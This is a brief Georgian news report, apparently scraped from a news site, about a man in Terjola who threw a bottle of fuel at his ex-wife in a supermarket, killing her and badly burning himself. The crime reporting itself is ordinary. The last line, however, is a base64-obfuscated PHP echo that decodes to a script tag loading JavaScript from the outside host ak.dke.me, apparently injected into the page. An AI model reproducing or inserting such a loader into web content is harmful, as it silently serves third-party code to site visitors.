celsiusi
ავერსი საქკაბელი
თერჯოლაში, სუპერმარკეტ „მაგნიტში“ 41 წლის მამაკაცმა ყოფილ მეუღლეს საწვავით სავსე ბოთლი ესროლა. ქალი ადგილზე გარდაიცვალა, თავად კი დაშავდა.
 
მამაკაცმა, თავადაც სხეულის 60-70%-იანი, მესამე-მეოთხე ხარისხის დამწვრობა მიიღო.
 
როგორც სამედიცინო ცენტრ „იმერმედის“ ექიმმა, თინათინ ჩაფიძემ ჟურნალისტებს განუცხადა, პაციენტი კლინიკაში შოკურ მდგომარეობაში შეიყვანეს. ის ამ დროისთვის რეანიმაციულ განყოფილებაში იმყოფება.
 
ექიმის განცხადებით, 41 წლის მამაკაცის სიცოცხლეს ამ ეტაპზე, საფრთხე არ ემუქრება.
 
მომხდარ ფაქტზე გამოძიება სისხლის სამართლის კოდექსის 11 პრიმა - 109-ე მუხლით დაიწყო, რაც ოჯახის წევრის მიმართ განსაკუთრებული სისასტიკით ჩადენილ განზრახ მკვლელობას გულისხმობს.
288
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");